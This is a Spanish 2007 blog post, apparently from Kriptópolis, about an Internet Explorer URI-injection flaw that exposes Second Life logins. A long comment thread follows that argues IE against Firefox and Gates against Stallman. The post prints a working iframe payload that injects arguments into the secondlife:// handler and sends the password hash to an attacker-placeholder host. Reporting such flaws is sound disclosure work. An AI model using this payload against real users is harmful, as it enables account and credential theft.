Según acaba de publicar GNU Citizen (y confirma Sergio Maone, creador de NoScript), nuestro viejo amigo el bug "compartido" (sí, ése sobre el que un preclaro MVP de Microsoft asegura que esta empresa no tiene ninguna responsabilidad) permite que te roben impunemente tu "existencia" en Second Life, un mundo virtual... donde también se hacen negocios reales.
Tan sencillo como hacer que la víctima visite con Explorer una página maliciosa con el siguiente contenido:
<iframe src='secondlife://" -autologin -loginuri
"http://web.atacante.com/sl/record-login.php'>
</iframe>
Se provoca así el arranque del cliente de Second Life, que intenta loguearse automáticamente en la web del atacante. Un script situado en ésta recoge el hash MD5 de la contraseña, que puede ser utilizado directamente para loguearse, o bien pasarse por unas rainbow tables para extraer la contraseña en claro...
Maone lamenta (quizás irónicamente) que esta vez, al tratarse de Explorer, NoScript no pueda protegernos.
Fuente:
Simple opinion
anónimo10 Octubre 2007 - 6:27pm
luego de leer muchas de las opiniones aqui expuestas (no las leí a todas lamentablemente), me gustaría aportar la mía.
por ahi lei a alguien que decia que "en firefox hay paginas que se ven mal", bueno, te digo que yo trabajo en el diseño de paginas web, y los portales que hacemos, los hacemos para los navegadores más utilizados, como Firefox, Safari e Internet Explorer... y con el que más renegamos es con este ultimo, dado que se pasa por los huevos las buenas prácticas en código HTML o CSS... en http://www.w3c.org puedes ver como se deben utilizar estas tecnologías, y oh casualidad que ese lastimoso navegador no las respeta. Si no puedes entrar en tu cuenta de MSN spaces, buenisimo, elimina la cuenta y create una en MYSpace, badoo o infinidad de redes sociales que existen hoy en día.
Yo particularmente poseo cuenta en gmail, con mi espacio de picasaweb, y si quisiera escuchar opiniones me haría un blog... es decir, opciones existen, lo que pasa es que los usuarios son unos cómodos y también muy controlables.
Como puede ser que la gente siga usando ese maldito sistema operativo lleno de errores, huecos de seguridad puestos a proposito, y un constante control de que haces o que pagina visitas? no se dan cuenta que si nadie, nunca más lo usara, comenzarían a salir más juegos, programas para otros sistemas operativos, se harían paginas para firefox y que IE se joda, etc....
También leí por ahi que la gente dice "a mi nunca me pasó nada con windows.... nunca me aparecio una de esas pantallas azules que me decis..." vamos, que más de una vez agarré a gente que me decía eso y cuando iba a visitarlos veia que sí se le colgaba, si le aparecia la pantalla azul, si tenía virus y todas las cosas que solian pasarme a mi...y la respuesta que uno obtiene a eso "es la primera vez que me pasa..." vamos...
y para concluir, yo estoy a favor del software libre, yo trabajo con él, y mis productos son entregados con el codigo fuente y publicados, y por suerte gano bastante bien, pero bueno, yo no estoy en contra del software propietario, y cerrado, cada uno es dueño de hacer lo que quiera con su creación... sólo pienso que el usuario final es el que debería decidir si quiere comprar un software privado y no saber si esta siendo controlado, u optar por la solucion libre (y que en más de una oportunidad se ha demostrado que por el hecho de ser abierto y que exista una comunidad por detras, es la mejor opcion)
ojalá en un futuro la gente sea más "culta" informaticamente y no le diera lo mismo usar una u otra cosa, sino que eligiera lo mejor en funcionalidad, seguridad y ética...
saludos
Por que tanto para nada?
anónimo18 Septiembre 2007 - 4:39pm
Es bien sabido que el que tiene algo en las manos debe de saber utilizarlo, por el contrario mejor dejarlo.
Si una persona compra un PC. lo mas logico es aprender a manejarlo, si desea navegar por internet, lo mas logico es aprender hacerlo, etc.
Todos empezamos como novatos hasta que aprendmos, yo por ejemplo me toco mas de una vez formatear el disco y meter todos los programas de nuevo varias veces por que no sabia como quitar un programa o un virus, desconocia el regedit y cuando empeze a usarlo para quitar ciertos programas por completo de mi sistema, tambien metia la pata.
Es como todo, nadie nace sabiendo, y todos tenemos que aprender a manejar lo que tenemos entre las manos. Por el contrario, los que no esten acostumbrados, y no desean aprender su manejo que se atengan a las consecuencias.
Hay muchos cursos impresos o por internet que a uno lo ayudan para tal cosa u otra.
Saludos
Dispositivos programables
anónimo18 Septiembre 2007 - 11:17am
Lo que queda perfectamente claro es que el usuario medio no esta preparado para manejar un equipo programable. Es necesario un sistema que no permita al usuario ni instalar ni borrar ni configurar software. Algo parecido a una consola de videojuegos, que se enchufa, se inserta un disco simplemente funciona sin más complicación.
Al no existir la posibilidad de romper nada, los usuarios no podrán ser engañados para forzarlos a romper las cosas. Si no pueden instalar software, no podrán instalar software malicioso ni siquiera accidentalmente.
Obviamente no me estoy refiriendo a los lectores de kriptópolis, que tienen un nivel de conocimientos bastante superior a la media. Pero el 90% de los usuarios del mundo sí caerían en la categoría de usuarios que necesitan algo que no se pueda romper.
No se puede dar un equipo programable y configurable a una persona que no sabe ni quiere saber programarlo y configurarlo.
Si una persona quiere escribir un texto, y una máquina de escribir es algo poco práctico actualmente, lo que hay que darle es algo que funcione igual de fácil que una máquina así. ¿A que nadie tuvo problemas nunca de que lo engañaran para que reconfigurara su máquina de escribir? No, porque las máquinas de escribir sólo las tocaba un técnico especializado.
Lo mismo tiene que ocurrir con los procesadores de texto. Si hay que instalar un nuevo diccionario, los usuarios en definitiva prefieren llamar a su amigo informático o al departamento de informática de la empresa. Entonces, si igual necesitan a un especialista, ¿por qué está al alcance del usuario tocar cosas que no conoce ni quiere aprender?
Pero atencion: no sirven restricciones tontas metidas en el manejador de archivos y que se saltean simplemente usando un programa diferente. La restricción debe ser completa, como por ejemplo que la partición donde van los programas sea de sólo lectura para el uso normal, y en la partición de datos no se puedan ejecutar programas. Quien necesite instalar software debería arrancar en un modo especial o incluso con un CD de arranque especial (que podría ser el mismo instalador del sistema operativo).
Estoy seguro de que los usuarios no se quejarían de tantas restricciones simplemente porque instalar software es algo que no les ineresa saber hacer mientras dispongan de alguien que se los haga. Y como al final no solo tenemos que ir a instalarles las cosas sino que tenemos que ir a quitarles los virus y a convencerlos de que no usen el explorer...
Tranquilizaos
anónimo17 Septiembre 2007 - 4:37pm
Veo el ambiente un poco cargado. No discutais por eso, lo digo por los primeros comentarios que he podido leer. Quien quiera entrar en Second Life con IE6 o IE7 alla ellos/as. Firefox tuvo y tiene sus problemillas y por eso los arregló y los está arreglando. ¿Que tardan menos en poner soluciones encima de la mesa? es cierto, pero a veces lo hacen ensuciando un poco el código y dejando nuevas vulnerabilidades. Y Microsoft lo arregla con bastante retraso.
Paciencia.
Pero luego la gente que entre con IE7 y pierda su identidad que no se queje porque, por ejemplo, Kriptopolis ya lo ha advertido. De mientras no cuesta nada bajarse Firefox o Opera y entrar en Second Life con dichos navegadores y cuando IE7 lo arreglé pues ya tu decides.
Saludos
se nota
anónimo17 Septiembre 2007 - 2:32pm
Se nota que el del ultimo comentario no ha entendido muy bien las cosas, podrias fijarte en articulos anteriores en kriptopolis porque es un error de IE y no de second life.
Yo no soy un experto en seguridad y por eso no te lo explico, pero si alguien podria en un par de lineas hacerle entender el por que se lo agradezco, asi a todos los que defienden IE se les mete en la cabeza que estan equivocados.
Pues yo te respondo
anónimo17 Septiembre 2007 - 7:20pm
Decir primero "se nota que no has entendido nada" y luego "que alguien se lo explique que yo no sé hacerlo" no parece nada serio, macho :)
El problema es de IE. La razón es que la URI que está pasando está construida de forma que se inyecta código.
El bug es este:
http://www.securityfocus.com/archive/1/370959
En cualquier caso, la autenticación de Second Life es una basura y eso ayuda a este tipo de exploits.
Y digo yo....
anónimo17 Septiembre 2007 - 1:03pm
¿Por qué es un error de IE? Yo creo que es un error de Second life, ¿no? Si Explorer se limita a lanzar el cliente second life y la autenticación la hace second life, pues el error es de second life, que tiene los santísimos güebos de mandar un hash en claro, sin salt y sin ná. Hablo desde la más profunda ignorancia, claro :)
No, la culpa es del IE
anónimo17 Septiembre 2007 - 4:21pm
Está claro que Second Life no tiene un sistema de autentificación como para tirar cohetes y que podían haber resuelto este problema por su cuenta, cosa que tendrán que hacer al final, porque si tienen que esperar a que Microsoft saque un parche... además, siempre habrá gente que no se actualice.
Visto así, algo de razón no te falta, pero el verdadero problema es que el IE lanza el cliente de autentificación de Second Life para un sitio que no tiene nada que ver.
Por otra parte, estoy seguro que un ataque parecido, explotando la misma vulnerabilidad y cambiando lo de
por
se podría utilizar contra muchos otros sitios.
Un saludo.
Es un error de IE
anónimo17 Septiembre 2007 - 2:23pm
Porque falla al validar URIs maliciosas y las pasa a las aplicaciones sin sanearlas. La prueba la tienes en que no funciona en otros navegadores, ya que Mozilla -por ejemplo- arregló su parte alicuota de culpa, mientras Microsoft decidó pasar de todo.
Tu falta de compresión quizás viene de que no captas que se no se trata de una URI normal, sino de otra maliciosamente construida, pero que Explorer se traga sin rechistar.
La mejor opción...
anónimo17 Septiembre 2007 - 11:42am
Yo hace ya bastante tiempo de dejé de "predicar". Que cada uno haga lo que quiera, allá él/ella.
Eso sí, si alguien se atreve luego a llamarme a que le arregle el ordenador, tengo dos opciones:
- o paso del tema y que se busque la vida,
- o (en los casos en los que por cercanía o parentesco no sea posible) me aseguro de que en la medida de lo posible no vuelva a pasar, tomando por mi cuenta las decisiones que creo conveniente (instalación de firefox, eliminación de cualquier acceso directo a explorer, explicación de unas normas mínimas de seguridad, que se dejen de visitar todas las páginas porno de la red, etc).
Si no sabes/quieres tomar unas mínimas normas de seguridad, y luego pretendes que yo te solucione la papeleta, lo mínimo que te va a costar mi tiempo y paciencia es que te ponga la cara colorada.
Con estas sencillas reglas, ya hace bastante tiempo que no tengo que arreglar un ordenador. La simple eliminación de los enlaces a IExplorer consiguió aumentar extraordinariamente el tiempo entre averías (el 90% no saben/pueden/se molestan en restaurar los accesos directos. Hay que aprovechar su propia ignorancia en nuestro beneficio).
¿Y lo que nos aburriríamos
anónimo17 Septiembre 2007 - 10:08am
¿Y lo que nos aburriríamos si no pasaran estas cosas? A mi me encanta cada vez que veo una nueva vulnerabilidad, me hace gracia XD
No es nada aburrido
anónimo17 Septiembre 2007 - 2:12pm
Acostumbrado a linux, a los antispam, a la ausencia de virus, a la comodidad de saber que tu sistema se autoactualiza de un dia para el siguiente, ya me han colado varias bichas cuando me he sentado delante de un Windows.... Menos mal que basta con borrar la imagen del qemu y reinstalar la copia del backup :-)
Si es que no hay color. En linux la seguridad te la da el sistema, en windows la tienes que poner tú.
Cierto
anónimo17 Septiembre 2007 - 11:12am
No lo reconoceran nunca: pero las vidas de los talibanes linuxeros no tendrían ningún sentido sin Microsoft.
IE?
anónimo17 Septiembre 2007 - 10:01am
Internet Explorer está bien cuando empiezas a manejarte en esto de los pc's, pero cuando vas "evolucionando" te das cuenta de ciertas cosas. Y no hay que ser un genio para ver que Firefox es más rápido que IE. Sin tanta pijadita de ventanas super brillantes y con reflejos que tanto gusta a los usuarios de MS, que casi parecen urracas.
El problema es el miedo a lo nuevo, el miedo a no utilizar lo de serie por si MS nos está vigilando y nos denuncia... que prefieren lo "oficial", que además de "prestigio" cuesta una pasta... mejor, así se puede sacar más la barriga. Typical Spanish.
Demasiado ruido
anónimo17 Septiembre 2007 - 5:05am
vamos hombre, se tiene que aceptar, Firefox no es la maravilla que tanto predicaban y que tan empeñosamente defienden, y no, no soy partidario de IE, simplemente que se tiene que ver la realidad, IE tiene toda una empresa que lo respalda, ademas de que esta en constante actualizacion, Firefox si bien cuenta tambien con esto, es este el que al que se le encuentran constantes problemas, recuerden que no por ser software libre quiere decir que es el mesias. Mucho tiene que ver con el uso que le den los usuarios, porque por mas seguro que sea tu navegador, y por mas antivirus que tengas, si el usuario no tiene las precauciones nesesarias, siempre terminara j*****, yo personalmente uso ambos exploradores, pero al que le doy mas trabajo es al de Microsoft, todo es cuestion de estar informado, ser precavido y por el amor de Dios, dejar esas cruzadas de terror y odio entre los navegadores.
es que no todas las paginas trabajan bien con firefox
anónimo17 Septiembre 2007 - 5:03am
Existen muchas paginas en las cuales firefox no muestra bien la informacion, ya saben... sobre todo en las de spaces etc. la mayoria paginas de MS, y como la gran mayoria de usuarios "normales" tiene cuenta de hotmail y por lo tanto alguna pagina en spaces pues eso implica usar IE para visualizarla bien. seamos realistas, no muchos webmasters se preocupan por compatibilidad en los exploradores pero es la verdad y firefox en esos casos no hace mas que mostrar la pagina erroneamente.
No es firefox
anónimo17 Septiembre 2007 - 11:16am
No es que firefox funcione mal sino que la página está llena de errores y eso afecta en diferente forma a distintos navegadores.
El standard html dice cómo interpretar las etiquetas pero no qué se debe hacer en caso de errores. Por ejemplo un navegador puede elegir ignorar el error, otro puede elegir descartar el área relacionada con la falla y no mostrarla, y otro puede pasarse de vivo y "arreglarlo" automáticamente.
Este es el motivo de que haya problemas con firefox, y la culpa es de quien hizo la página.
¿Qué hacer? Bueno, en principio presionar. Quien hace una página es porque quiere que sea visitada. Si no visitamos las páginas que funcinan mal se verán obligados a arreglarlas. Siempre que sea posible se debe reportar el fallo. Finalmente, y si la página es muy imprescindible, se puede usar la extensión IE TAB, pero se la debe usar sólo en sitios muy puntuales donde sea imprescindible acceder (la página del banco por ejemplo). Y mucho cuidado, que al abrir una página con ietab te estas exponiendo a un ataque igual al que tendrías si usaras explorer directamente.
El problema
anónimo17 Septiembre 2007 - 1:18am
El problema,en mi opinión, es que hay millones de personas que se ven obligadas a utilizar ordenadores a diario y no les gusta la informática lo más mínimo, por lo que no ponen ningún interés en ella. Cuando pasa lo que tiene que pasar, con llamar al tito "amigo informático" (coloque aquí su nombre), está todo arreglado. Por eso a Microsoft se le cuelan estas cosas y la gente sigue utilizando IE, simplemente porque viene de serie en Windows. De otro modo, algo de esto habría pasado una vez, el número de usuarios habría caído en picado y, a partir de entonces, la seguridad hubiera aumentado exponencialmente.
El problema de siempre son los usuarios.
Resaka16 Septiembre 2007 - 11:57pm
Yo a muchos amigos le he dicho que no usen IE y usen firefox o si no opera. La mayoria lo usan 2 o 3 horas, luego vuelven a IE y pasa lo que pasa.
Hasta que no sucede algo gordo no se dan cuenta, y aun asi, ni eso.
Firefox no es la panacea
anónimo16 Septiembre 2007 - 11:49pm
Firefox no es la panacea en seguridad, eso está claro, pero hoy en día usar IE (tanto 6 como 7) ya no sólo me parece una irresponsabilidad en la medida en que hagas algo en lo que necesite seguridad, si no que me parece funcionalmente un atraso.
Cualquier persona por muy poco que sepa de informática se acostumbra en tres minutos a Firefox (yo se lo tengo a mi novia, a mi padre y a mis tios) Opera o cualquier otro, aunque el argumento de 'que les den por usar explorer, se lo tienen merecido' támpoco me parece el adecuado, ya que algunos nos vemos obligados a usar Explorer para algunas cosas (pag. sector público p.ej.), y ya se que hay un plug-in en firefox para eso, gracias.
Y vamos a ver firefox no triunfa ni es mejor que IE por ser libre, triunfa por ser cómodo, ligero, seguro, personalizable, bonito, multiformato, ...(y además libre).
Lo de que los 'willows' vengan con Firefox de fábrica lo veo dificil, pero bueno si es por pedir, que monten el eMule, el OpenOffice, el Avg y bueno el Google Pack entero, no en serio lo peor de todo es que Microsoft reconoce tarde sus fallos ya que 'se creen la caña' sin embargo Firefox tarda menos y no es ningún desprestigio para ellos reconocer y corregir fallos.
Kike dijo esto.
basta
ICeman16 Septiembre 2007 - 9:27pm
Basta, me cansé. Estamos en el 2007 y hay gente que todavía navega con Internet Explorer. ¡Que se jodan! Hace por lo menos 5 años que "la comunidad" venimos abogando por el uso de navegadores seguros.
Así como "el que quiera entender que entienda" hagamos "el que quiera estar seguro que lo esté" y el que quiera llenarse de virus y que le usurpen la identidad tiene Windows con Internet Explorer. Cada cosa en su lugar.
PD: si yo fuera responsable de producto en MS o pongo Opera/Firefox de fábrica en lugar del explorer o me pego un tiro; a esta altura del partido son las únicas opciones dignas para los trabajadores de tal empresa.
Pos vale...
anónimo17 Septiembre 2007 - 9:06am
Es una actitud estupenda... Si usas Windows es porque eres tonto, si usas Explorer eres ya tonto profundo... y te mereces todo lo que te pase...
Pues muy bien, asi se va a conseguir la proliferacion del software libre, insultando y tratando a los que no lo usan como si fueran idiotas, como estrategia comercial es arriesgada, no se quiza funcione...
Luego resulta que Microsoft es el demonio y lo hace todo mal. Pues visto lo visto, al menos en algo son mas listos, no tratan a los que no usan su S.O o navegador como si fueran imbeciles...
PD: Pues yo estoy hasta las mismas narices de Linuxeros toca narices que se creen dioses de la informatica y me van jod... la red cada 2 por 3 por hacer barbaridades.
Demonio?
anónimo17 Septiembre 2007 - 9:40am
no estoy de acuerdo en que Microsoft sea "el demonio".
esa figura les cuadra mejor a los defensores del software libre, liderados por el anticristo Stallman, pro-comunistas y rompedores de las familias.
Microsoft sería más comparable con la iglesia oficial, siempre apegada al poder y los poderosos, disfrutando sus favores y liderada por el Mesías Gates.
No hay nada heterodoxo ni malvado en Microsoft. Todo lo contrario: representa como nadie el satus quo capitalista y bienpensante.
Anja osea...
a0x17 Septiembre 2007 - 3:13pm
Entonces si microsoft es la iglesia de los poderosos y esta siempre apegada al poder y se hace llamar la iglesia oficial, entonces una preguntica....
A ti te dejan entrar a esa iglesia??????
Lo digo porque la defiendes tanto y "conoces" tanto de ella que por lo visto tienes un pase especial....
Y si William Gates es el Mesias esta viendo caer su imperio asi que deberia de bajar nuevamente del cielo para que nosotros lo crucifiquemos.
Postdata. Esta vez no seran latigazos......
Mejor Gates que Stallman
anónimo17 Septiembre 2007 - 11:08am
Stallman representa el arquetipo negativo del progre: el que vive de subvenciones que cobra por decir a los demás lo que deben de hacer, sin importar lo más mínimo que lo que dice sean estupideces: "que los programadores de GNU/Linux trabajen en un McDonald o en cualquier sitio para pagar las facturas, pero que no hagan software propietario".
Stallman no sé si será comunista o rompe familias (desde luego no creo que haya roto muchos matrimonios gracias a su gran belleza física), pero que es un iluminado desagradable y que resultaría peligroso si alguien le hiciera caso, es indudable.
En mi opinión William Gates aventaja mucho a Stallman en responsabilidad, dignidad, honestidad, decencia y respetabilidad.
Confirmado pues
anónimo17 Septiembre 2007 - 2:20pm
El anticristo no es Gates, sino Stallman, el progre comunista judeomasónico.
La conspiración la encabeza pues la FSF y no Hasecorp.
Linux es el maligno, Hasecorp la iglesia bendecida por los poderosos de toda la vida.
Joer, lo que yo decía!
Te equivocas
anónimo17 Septiembre 2007 - 9:11am
Ahí te equivocas. Microsoft ya lo hizo.
A Microsoft le ha funcionado. De hecho su éxito se basa en tratar a los usuarios como estúpidos.
Pos no
anónimo17 Septiembre 2007 - 9:26am
No, no me equivoco por que:
A) la opinion de un individuo, no expresa la de una compañia, me consta que tuvo que pedir disculpas...
B) Habla de todo el mundo en general, no de los que usan este o aquel sistema operativo.
C) Particularmente, ademas, estoy de acuerdo con el.
Respecto al segundo punto, no todo el mundo tiene que ser un "guru" de la informatica como tu, de hecho no lo suelen ser, Microsoft trata de simplificar las cosas para gente que le importa un pimiento que es Linux y el Software libre, ESO es lo que les funciona...
Ah, ya entiendo...
anónimo17 Septiembre 2007 - 9:36am
la opinion de un individuo, no expresa la de una compañia
Como el Espíritu Santo, Microsoft es una entidad celestial que está por encima de los falibles humanos. Ninguna opinión de sus directivos es la de la empresa, sólo William Gates es el Papa infalible y omniscente.
No, no creo que entiendas...
anónimo18 Septiembre 2007 - 9:00am
Tu que trabajas en una charcuteria?, o directamente no trabajas...
Ni entidad celestial ni gaitas... no creo que sea tan dificil de entender que una persona, por muy directivo que sea, no marca o define de forma exclusiva la imagen u opinion corporativa de una marca o empresa.
Pero vamos, volviendo al punto de origen, yo uso IE desde siempre, por tanto debo ser estupido, estupido y con suerte... por que hasta la fecha, ni me han robado contraseñas ni he caido en un phising ni nada de nada...
Claro, a lo mejor es por que no me meto en una web que me llega por mail, o no me instalo cien mil barritas para el explorador, o lo mismo es por que rezo todas las noches a san Billy no te digo...
Si una persona recibe un correo instandole a entrar en esta o aquella web y entra, ya puede tener IE, Firefox, Netscape, Mozilla o lo que le de la gana que se la van a liar... es asi de simple.
Navegadores seguros?
anónimo16 Septiembre 2007 - 10:22pm
Hablas de IExplorer como si fuera el unico que tenga errores. Pues chico, firefox ha tenido sus epocas negras en cuanto a errores criticos sin solucionar.
Pero como el firefox es libre, es seguro, no? ja.
No es el único con fallos, no...
anónimo16 Septiembre 2007 - 11:24pm
... pero sí es el único cuyo fabricante (Microsoft) se niega a reconocerlos y a repararlos:
http://www.kriptopolis.org/arrieros-somos
De aquellos polvos, estos lodos.